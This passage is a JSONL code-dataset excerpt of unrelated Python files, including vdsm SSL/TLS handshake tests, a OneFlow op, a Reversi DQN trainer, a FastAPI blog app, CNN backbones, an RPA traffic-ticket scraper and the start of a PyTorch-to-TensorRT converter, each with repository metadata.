'::ffff:127.0.0.1')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('example.com', ['10.0.0.1', '10.0.0.2'])],\n indirect=True)\ndef test_multiple(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.2', 'example.com')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('evil.imposter.com', ['10.0.0.1'])],\n indirect=True)\ndef test_imposter(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('127.0.0.1', 'example.com'),\n ('::1', 'example.com'),\n ('::ffff:127.0.0.1', 'example.com')])\ndef test_local_addresses(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.fixture\ndef dummy_register_protocol_detector(monkeypatch):\n monkeypatch.setattr(MultiProtocolAcceptor, '_register_protocol_detector',\n lambda d: d.close())\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef listener(dummy_register_protocol_detector, key_cert_pair, request): # noqa: F811, E501\n key_file, cert_file = key_cert_pair\n reactor = Reactor()\n\n sslctx = SSLContext(cert_file=cert_file, key_file=key_file,\n ca_certs=cert_file)\n\n acceptor = MultiProtocolAcceptor(\n reactor,\n '127.0.0.1',\n 0,\n sslctx=sslctx\n )\n\n try:\n t = concurrent.thread(reactor.process_requests)\n t.start()\n (host, port) = acceptor._acceptor.socket.getsockname()[0:2]\n yield (host, port)\n finally:\n acceptor.stop()\n reactor.stop()\n t.join()\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef client_cmd(listener, key_cert_pair): # noqa: F811\n key_file, cert_file = key_cert_pair\n\n def wrapper(protocol):\n (host, port) = listener\n cmd = ['openssl', 's_client', '-connect', '%s:%s' % (host, port),\n '-CAfile', cert_file, '-cert', cert_file, '-key', key_file,\n protocol]\n return commands.run(cmd)\n\n return wrapper\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-ssl2',\n id='ssl2'\n ),\n pytest.param(\n '-ssl3',\n id='ssl3'\n ),\n 
pytest.param(\n '-tls1',\n id='tls1'\n ),\n pytest.param(\n '-tls1_1',\n id='tls1.1'\n )\n])\ndef test_tls_unsupported_protocols(client_cmd, protocol):\n with pytest.raises(cmdutils.Error):\n client_cmd(protocol)\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-tls1_2',\n id='tls1.2'\n ),\n])\ndef test_tls_protocols(client_cmd, protocol):\n assert b\"Verify return code: 0 (ok)\" in client_cmd(protocol)\n","repo_name":"oVirt/vdsm","sub_path":"tests/ssl_test.py","file_name":"ssl_test.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"16"}
+{"seq_id":"19806580385","text":"from __future__ import absolute_import\n\n\nimport oneflow.core.operator.op_conf_pb2 as op_conf_util\nimport oneflow.core.register.logical_blob_id_pb2 as logical_blob_id_util\nimport oneflow.python.framework.interpret_util as interpret_util\nimport oneflow.python.framework.distribute as distribute_util\nimport oneflow.python.framework.id_util as id_util\nimport oneflow.python.framework.input_blob_def as input_blob_util\nimport oneflow.python.framework.remote_blob as remote_blob_util\nfrom oneflow.python.oneflow_export import oneflow_export\nfrom typing import Optional, Tuple\n\n\n@oneflow_export(\"experimental.indexed_slices_reduce_sum\")\ndef indexed_slices_reduce_sum(\n indices: input_blob_util.ArgBlobDef,\n values: input_blob_util.ArgBlobDef,\n name: Optional[str] = None,\n) -> Tuple[remote_blob_util.BlobDef]:\n op_conf = op_conf_util.OperatorConf()\n if name is None:\n op_conf.name = id_util.UniqueStr(\"IndexedSlicesReduceSum_\")\n else:\n op_conf.name = name\n\n op_conf.indexed_slices_reduce_sum_conf.x_indices = indices.unique_name\n op_conf.indexed_slices_reduce_sum_conf.x_values = values.unique_name\n op_conf.indexed_slices_reduce_sum_conf.y_indices = \"y_indices\"\n op_conf.indexed_slices_reduce_sum_conf.y_values = \"y_values\"\n op_conf.indexed_slices_reduce_sum_conf.num_unique = \"num_unique\"\n\n interpret_util.Forward(op_conf)\n y_indices_lbi = logical_blob_id_util.LogicalBlobId()\n y_indices_lbi.op_name = op_conf.name\n y_indices_lbi.blob_name = \"y_indices\"\n y_values_lbi = logical_blob_id_util.LogicalBlobId()\n y_values_lbi.op_name = op_conf.name\n y_values_lbi.blob_name = \"y_values\"\n num_unique_lbi = logical_blob_id_util.LogicalBlobId()\n num_unique_lbi.op_name = op_conf.name\n num_unique_lbi.blob_name = \"num_unique\"\n\n return (\n remote_blob_util.RemoteBlob(y_indices_lbi),\n remote_blob_util.RemoteBlob(y_values_lbi),\n remote_blob_util.RemoteBlob(num_unique_lbi),\n )\n","repo_name":"Sodu-Qinming/Oneflow","sub_path":"oneflow/python/experimental/indexed_slices_ops.py","file_name":"indexed_slices_ops.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23636562039","text":"class DiameterOfBinaryTree:\n \"\"\"\n Desc:\n # 543\n Given the root of a binary tree, return the length of the diameter of the tree.\n Link: \n https://leetcode.com/problems/diameter-of-binary-tree/\n Notes:\n \"\"\"\n\n # dfs\n # Time: O(n) - nodes in tree\n # Space: O(n)\n def diameterOfBinaryTree(self, root): \n # the diameter is the longest path b/n any two nodes\n # path is a cnt of edges\n \n res = 0\n \n # for each node get length of left and right path\n # res = max(left + right paths, res)\n \n def maxPath(n):\n if not n: return 0\n \n nonlocal res\n \n # get max paths\n left = maxPath(n.left) \n right = maxPath(n.right)\n path = 1 + max(left, right)\n \n # check diameter \n res = max(res, left + right)\n \n return path \n \n maxPath(root)\n return res\n\n\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right","repo_name":"csdatasist/lc-repo","sub_path":"others/DiameterOfBinaryTree.py","file_name":"DiameterOfBinaryTree.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27489946784","text":"import numpy as np\r\n\r\nimport argparse\r\nfrom reversi import Reversi\r\nfrom dqn_agent import DQNAgent\r\nfrom random_agent import RANDOMAgent\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-m\", \"--model_path\", help='Path to the model files')\r\n parser.add_argument(\"-l\", \"--load\", dest=\"load\", action=\"store_true\",\r\n default=False, help='Load trained model (default: off)')\r\n parser.add_argument(\"-e\", \"--epoch-num\", dest=\"n_epochs\", default=30,\r\n type=int, help='Number of training epochs (default: 30)')\r\n parser.add_argument(\"--simple\", dest=\"is_simple\", action=\"store_true\", default=True,\r\n help='Train simple model without cnn (8 x 8) (default: true)')\r\n parser.add_argument(\"-g\", \"--graves\", dest=\"graves\", action=\"store_true\",\r\n default=False, help='Use RMSpropGraves (default: off)')\r\n parser.add_argument(\"-d\", \"--ddqn\", dest=\"ddqn\", action=\"store_true\",\r\n default=False, help='Use Double DQN (default: off)')\r\n parser.add_argument(\"-s\", \"--save-interval\", dest=\"save_interval\", default=15, type=int) # 1000\r\n args = parser.parse_args()\r\n\r\n # parameters\r\n n_epochs = args.n_epochs\r\n\r\n # environment, agent\r\n env = Reversi()\r\n\r\n # playerID\r\n playerID = [env.Black, env.White, env.Black]\r\n\r\n # player agent\r\n players = []\r\n # player[0] = env.Black\r\n agent = DQNAgent(env.enable_actions, env.name, color=\"black\", ddqn=args.ddqn)\r\n if args.load:\r\n agent.load_model(args.model_path)\r\n else:\r\n agent.init_model()\r\n players.append(agent)\r\n\r\n # player[1] = env.White\r\n agent = RANDOMAgent(env.enable_actions, env.name, color=\"white\")\r\n players.append(agent)\r\n\r\n # # variables\r\n wins = [0, 0]\r\n e = 0 # epoch counter\r\n \r\n while e < n_epochs:\r\n # reset\r\n env.reset()\r\n\r\n state_ts = [None, None]\r\n action_ts = [None, None]\r\n state_t_1s = [None, None]\r\n reward_ts = [None, None]\r\n terminals = [None, None]\r\n \r\n while not env.isEnd():\r\n\r\n # get the player whose turn comes next\r\n # as long as the game is not over, this can only be Black or White\r\n next_player_color = env.get_next_player()\r\n idx = 0 if next_player_color == env.Black else 1 if next_player_color == env.White else None # None here would mean the program is broken\r\n\r\n # observe environment\r\n state_t_1s[idx], reward_ts[idx], terminals[idx] = env.observe(next_player_color)\r\n\r\n # push the result of the previous time step into the experience store\r\n # ideally env.observe() and store_experience would run right after env.execute_action(action_ts[col], playerID[col]),\r\n # but because the opponent moves in between, the push is deferred until this player's next turn\r\n if action_ts[idx] is not None:\r\n players[idx].store_experience([state_ts[idx]], action_ts[idx], reward_ts[idx], [state_t_1s[idx]], terminals[idx])\r\n\r\n # assign the board about to be played on to state_t\r\n state_ts[idx] = state_t_1s[idx] \r\n # select an action\r\n action_ts[idx] = players[idx].select_action([state_ts[idx]], players[idx].exploration)\r\n # actually apply the action to the environment\r\n env.execute_action(action_ts[idx], playerID[idx])\r\n\r\n # leaving the while loop means the game has ended\r\n # store the final experience\r\n for i, color in enumerate([env.Black, env.White]):\r\n state_t_1s[i], reward_ts[i], terminals[i] = env.observe(color)\r\n players[i].store_experience([state_ts[i]], action_ts[i], reward_ts[i], [state_t_1s[i]], terminals[i])\r\n\r\n if reward_ts[i] == 1:\r\n wins[i] += 1\r\n \r\n # learning starts after every game -> change this so that learning starts only after every N games\r\n\r\n # decrease epsilon\r\n players[0].update_exploration(e)\r\n players[1].update_exploration(e)\r\n\r\n # training\r\n players[0].experience_replay(e)\r\n players[1].experience_replay(e)\r\n\r\n # update the target_model every 10 games\r\n if e % 10 == 0:\r\n players[0].update_target_model()\r\n players[1].update_target_model()\r\n players[0].reset_experience()\r\n players[1].reset_experience()\r\n\r\n print(f\"EPOCH: {e:03d}/{n_epochs - 1:03d} | BLACK_WIN: {wins[0]:03d} | WHITE_WIN: {wins[1]:03d}\")\r\n if e > 0 and e % args.save_interval == 0:\r\n players[0].save_model(e)\r\n players[0].save_model()\r\n players[1].save_model(e)\r\n players[1].save_model()\r\n e += 1\r\n\r\n # save model\r\n players[0].save_model()\r\n players[1].save_model()\r\n","repo_name":"youseegreen/reversi_keras_dqn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34754001259","text":"from fastapi import FastAPI, Depends, status, Response, HTTPException\r\nimport models, schemas\r\nfrom database import engine, SessionLocal\r\nfrom sqlalchemy.orm import Session\r\n\r\napp = FastAPI()\r\n\r\nmodels.Base.metadata.create_all(bind=engine)\r\n\r\ndef get_db():\r\n\tdb = SessionLocal()\r\n\ttry:\r\n\t\tyield db\r\n\tfinally:\r\n\t\tdb.close()\r\n\r\n# Create a Blog\r\n\r\n@app.post('/blogs', status_code=status.HTTP_201_CREATED) #status_code=201 also works\r\ndef create(blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tnew_blog = models.Blog(title=blog.title, body=blog.body)\r\n\tdb.add(new_blog)\r\n\tdb.commit()\r\n\tdb.refresh(new_blog)\r\n\treturn new_blog\r\n\r\n# Delete a Blog\r\n\r\n@app.delete('/blogs/{id}', status_code=status.HTTP_204_NO_CONTENT)\r\ndef destroy(id:int, db:Session=Depends(get_db)):\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog.delete(synchronize_session=False)\r\n\tdb.commit()\r\n\treturn {'detail':f'Blog {id} has been deleted.'}\r\n\r\n# Update a Blog\r\n\r\n@app.put('/blog/{id}', status_code=status.HTTP_202_ACCEPTED)\r\ndef update(id:int, blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tblog_ = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog_.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog_.update(blog.dict(), synchronize_session=False)\r\n\tdb.commit()\r\n\treturn f'Blog {id} updated successfully.'\r\n\r\n# Show all Blogs\r\n\r\n@app.get('/blogs')\r\ndef all(db:Session=Depends(get_db)):\r\n\tblogs = db.query(models.Blog).all()\r\n\treturn blogs\r\n\r\n# Show a particular Blog\r\n@app.get('/blogs/{id}', status_code=200)\r\ndef show(id:int, response:Response, db:Session=Depends(get_db)):\r\n\t# blog = db.query(models.Blog)[id-1]\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id).first()\r\n\t\r\n\tif not blog:\r\n\t\t#response.status_code = status.HTTP_404_NOT_FOUND\r\n\t\t#return {'detail':f'Blog with ID {id} not found'}\r\n\t\t\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog with ID {id} not found')\r\n\r\n\t\r\n\treturn blog","repo_name":"suprateembanerjee/debug","sub_path":"blog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6445170157","text":"import torch.nn as nn\nfrom torchvision import models as models_2d\n\n\nclass Identity(nn.Module):\n \"\"\"Identity layer to replace last fully connected layer\"\"\"\n\n def forward(self, x):\n return x\n\n\n################################################################################\n# ResNet Family\n################################################################################\n\n\ndef resnet_18(pretrained=True):\n model = models_2d.resnet18(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_34(pretrained=True):\n model = models_2d.resnet34(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_50(pretrained=True):\n model = models_2d.resnet50(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\n################################################################################\n# DenseNet Family\n################################################################################\n\n\ndef densenet_121(pretrained=True):\n model = models_2d.densenet121(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_161(pretrained=True):\n model = models_2d.densenet161(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_169(pretrained=True):\n model = models_2d.densenet169(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\n################################################################################\n# ResNextNet Family\n################################################################################\n\n\ndef resnext_50(pretrained=True):\n model = models_2d.resnext50_32x4d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n\n\ndef resnext_100(pretrained=True):\n model = models_2d.resnext101_32x8d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n","repo_name":"marshuang80/gloria","sub_path":"gloria/models/cnn_backbones.py","file_name":"cnn_backbones.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"16"}
+{"seq_id":"6551110425","text":"\"\"\"\r\nGiven an integer array nums, find a \r\nsubarray that has the largest product, and return the product.\r\n\"\"\"\r\n\r\ndef maxProduct(self, nums) -> int:\r\n # track the best product seen over all running prefix/suffix products\r\n maxi = float('-inf')\r\n pref = 1\r\n suff = 1\r\n for i in range(len(nums)):\r\n # restart a running product once it hits zero, since a zero ends any candidate subarray\r\n if pref == 0 : pref = 1\r\n if suff == 0 : suff = 1\r\n # prefix product scans from the left, suffix product from the right;\r\n # the maximum subarray product is always one of these running products\r\n pref *= nums[i]\r\n suff *= nums[len(nums)-i-1]\r\n maxi = max(maxi,pref,suff)\r\n return maxi","repo_name":"AyusDas/dsa","sub_path":"imp_algo/Subarray/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11548067971","text":"\"\"\"Template robot with Python.\"\"\"\nfrom handlers import process\nfrom service import final_json\nimport json\nfrom RPA.Robocorp.WorkItems import WorkItems\n\nworkitem = WorkItems()\nworkitem.get_input_work_item()\ncomparendo_list = [\"comparendo_type\", \"comparendo_status\", \"id_comparendo\", \"dummy\", \"placa\", \"comparendo_date\", \"comparendo_saldo\", \"comparen_intereses\", \"comparendo_total\", \"comparendo_medium\"]\nurl = \"https://consultas.transitobogota.gov.co:8010/publico/index3.php\"\nplate_number = workitem.get_work_item_variable(\"placa\") #\"BRY010gy\"\ndoc_number = workitem.get_work_item_variable(\"doc_number\")#\"1060634\"\ndoc_type = workitem.get_work_item_variable(\"doc_type\")#\"CE\"\n\n# plate_number = \"BWL600\"\n# doc_number = \"819063\"\n# doc_type = \"CE\"\n\n\n\ndef trafic_ticket():\n try:\n process.open_webpage(url)\n number_of_pages = process.make_search(doc_type, plate_number, doc_number)\n total_comparendo = {}\n final_comparendo = {}\n for j in range(number_of_pages):\n for i in range(50):\n try:\n comparendo_dict = process.scrapr_from_the_initial_table(4+i, comparendo_list)\n if comparendo_dict == \"\":\n break\n else:\n total_comparendo[\"comparendo{0}\".format(i+1)] = comparendo_dict\n except Exception as e:\n raise(e)\n final_comparendo[\"data\"] = total_comparendo\n json_object = json.dumps(final_comparendo, indent=4)\n \n with open(\"./output/schema.json\", \"w\") as outfile:\n outfile.write(json_object)\n workitem.create_output_work_item(variables=final_comparendo, save=True)\n except Exception as e:\n workitem.release_input_work_item(\"FAILED\", \"BUSINESS\", message=e)\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n trafic_ticket()\n # captcha_solution = captcha_solver.twocaptcha_solver(\"captcha.png\")\n","repo_name":"Wale17/Traffic-ticket-bot","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23606993558","text":"import os\nimport json\nimport torch\nimport traceback\nfrom torch import nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom .utils import Json, TransLog, LayerOut_id, REGISTERED_LIST, get_weight\nfrom . import config as cfg\n\n\n\n# global params\nlog = TransLog()\nINLINE = False\nPLULINE = False\nDEBUG = cfg.DEBUG\nPARAM_FLAG = True\nJSON_PARAM = {}\nMODULE_DICT = {}\n\n# Tensor operator\nraw__add__ = torch.Tensor.__add__\nraw__sub__ = torch.Tensor.__sub__\nraw__permute__ = torch.Tensor.permute\nraw__expand_as__ = torch.Tensor.expand_as\n\n\nPLUGINS_LIST = [\n \"BasicBlock\",\n \"Hsigmoid\",\n \"Hswish\",\n]\n\n\ndef get_parameters():\n global PARAM_FLAG\n global JSON_PARAM\n\n if PARAM_FLAG:\n js_init = Json(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"))\n js_param = js_init.get_json_param()\n JSON_PARAM = js_param\n PARAM_FLAG = False\n return js_param\n\n js_param = JSON_PARAM\n\n return js_param\n\n\n# nn.Conv2d ---> F.conv2d\ndef _conv2d(raw, input, weight, bias=None, stride=1, padding=0, dilation=1, groups=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, dilation, groups)\n INLINE = True\n name = log.add_layer(name=\"conv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n\n # add json params\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}\"\n\n conv_params = dict(\n {\n \"layerStyle\": \"conv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n \"dilation\": dilation,\n \"groups\": groups,\n },\n }\n )\n\n if DEBUG:\n print(conv_params)\n js_param = get_parameters()\n js_param[\"network\"].append(conv_params)\n INLINE = False\n return x\n\n\n# nn.ReLU ----> F.relu\ndef _relu(raw, input, inplace=False):\n global INLINE\n name = log.add_layer(name=\"relu_\")\n inputName_ = log.blobs(input, name) # 这样防止 x == input时,它们id一致\n x = raw(input, inplace)\n INLINE = True\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n relu_params = dict(\n {\n \"layerStyle\": \"active\",\n \"layerName\": name,\n \"inputName\": inputName_,\n \"activeType\": \"relu\",\n }\n )\n if DEBUG:\n print(relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(relu_params)\n INLINE = False\n return x\n\n\n# nn.leakyReLU ---> F.leakyReLU\ndef _leaky_relu(raw, input, negative_slope=0.01, inplace=False):\n global INLINE\n x = raw(input, negative_slope, inplace)\n INLINE = True\n name = log.add_layer(name=\"leaky_relu_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n leaky_relu_params = dict(\n {\"layerStyle\": \"active\", \"layerName\": name, \"inputName\": log.blobs(input, name), \"active_type\": \"l_relu\"}\n )\n\n if DEBUG:\n print(leaky_relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(leaky_relu_params)\n INLINE = False\n return x\n\n\n# nn,MaxPool2d ---> F.max_pool2d\ndef _max_pool2d(raw, *args, **kwargs):\n global INLINE\n # args = (input, kernel, stride, padding, dilation, ceil_mode, return_indices)\n x = raw(*args, **kwargs)\n INLINE = 
True\n name = log.add_layer(name=\"max_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n max_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(args[0], name),\n \"parameter\": {\n \"poolType\": \"kMAX\",\n # \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n # \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n # \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n \"kernel\": [args[1], args[1]] if isinstance(args[1], int) else args[1],\n \"stride\": [args[2], args[2]] if isinstance(args[2], int) else args[2],\n \"padding\": [args[3], args[3]] if isinstance(args[3], int) else args[3],\n },\n }\n )\n if DEBUG:\n print(max_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(max_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.AvgPool2d ----> F.avg_pool2d\ndef _avg_pool2d(\n raw,\n input,\n kernel_size,\n stride=None,\n padding=0,\n ceil_mode=False,\n count_include_pad=True,\n divisor_override=None,\n):\n global INLINE\n # forward the caller's arguments instead of hard-coded defaults\n x = raw(input, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override)\n INLINE = True\n name = log.add_layer(name=\"avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVERAGE\",\n \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n },\n }\n )\n if DEBUG:\n print(avg_pool2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Linear ---> F.linear\ndef _linear(raw, input, weight, bias=None):\n global INLINE\n x = raw(input, weight, bias)\n INLINE = True\n name = log.add_layer(name=\"linear_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasKey = f\"{name}\"\n # add json param\n linear_params = dict(\n {\n \"layerStyle\": \"fc\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\"input_c\": input.shape[1], \"output_c\": x.shape[1]},\n }\n )\n if bias is not None:\n linear_params[\"biasKey\"] = biasKey\n if DEBUG:\n print(linear_params)\n js_param = get_parameters()\n js_param[\"network\"].append(linear_params)\n INLINE = False\n return x\n\n\n# nn.AdaptiveAvgPool2d ---> F.adaptive_avg_pool2d\n# not supported by tensorrt, pytorch test only\ndef _adaptive_avg_pool2d(raw, input, output_size):\n global INLINE\n x = raw(input, output_size)\n INLINE = True\n name = log.add_layer(name=\"adaptive_avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n if isinstance(output_size, int):\n out_size_0 = output_size\n out_size_1 = output_size\n else:\n out_size_0 = output_size[0]\n out_size_1 = output_size[1]\n\n input_sz = np.array(input.shape[2:]) # input_size [H * W]\n output_sz = np.array([out_size_0, out_size_1])\n\n stride_sz = 
np.floor(input_sz / output_sz)\n kernel_sz = input_sz - (output_sz - 1) * stride_sz\n\n # no weight extract\n # add json params\n adaptive_avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVG\",\n \"kernel\": [int(kernel_sz[0]), int(kernel_sz[1])],\n \"stride\": [int(stride_sz[0]), int(stride_sz[1])],\n \"padding\": [0, 0],\n },\n }\n )\n if DEBUG:\n print(adaptive_avg_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(adaptive_avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Softmax ---> F.softmax\ndef _softmax(raw, input, dim=None, _stacklevel=3, dtype=None):\n global INLINE\n x = raw(input, dim, _stacklevel, dtype)\n INLINE = True\n name = log.add_layer(name=\"softmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n softmax_params = dict(\n {\n \"layerStyle\": \"softmax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n }\n )\n if DEBUG:\n print(softmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(softmax_params)\n INLINE = False\n return x\n\n\n# ConvTranspose2d ---> F.conv_transpose2d\ndef _conv_transpose2d(raw, input, weight, bias=None, stride=1, padding=0, output_padding=0, groups=1, dilation=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, output_padding, groups, dilation)\n INLINE = True\n name = log.add_layer(name=\"Deconv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}.bias\"\n\n # add json params\n conv_transpose2d_params = dict(\n {\n \"layerStyle\": \"deconv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n },\n }\n )\n if bias is not None:\n conv_transpose2d_params[\"biasFile\"] = biasFile\n if DEBUG:\n print(conv_transpose2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(conv_transpose2d_params)\n return x\n\n\n# ['ConstantPad1d', 'ConstantPad2d', 'ConstantPad3d'] ---> F.pad\ndef _pad(raw, input, pad, mode=\"constant\", value=0):\n global INLINE\n x = raw(input, pad, mode, value)\n INLINE = True\n name = log.add_layer(name=\"pad_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # not weight extract\n # add json params\n pad_params = dict(\n {\n \"layerStyle\": \"padding\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"prePadding\": [0, 0],\n \"postPadding\": [1, 1],\n },\n }\n )\n if DEBUG:\n print(pad_params)\n js_param = get_parameters()\n js_param[\"network\"].append(pad_params)\n INLINE = False\n return x\n\n\n# F.interpolate\ndef _interpolate(\n raw, input, size=None, scale_factor=None, mode=\"nearest\", align_corners=None, recompute_scale_factor=None\n):\n global INLINE\n x = raw(input, size, scale_factor, mode, align_corners, recompute_scale_factor)\n INLINE = True\n name = log.add_layer(name=\"interpolate_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json param\n resizeMode = {\"nearest\": 0, \"bilinear\": 1}\n 
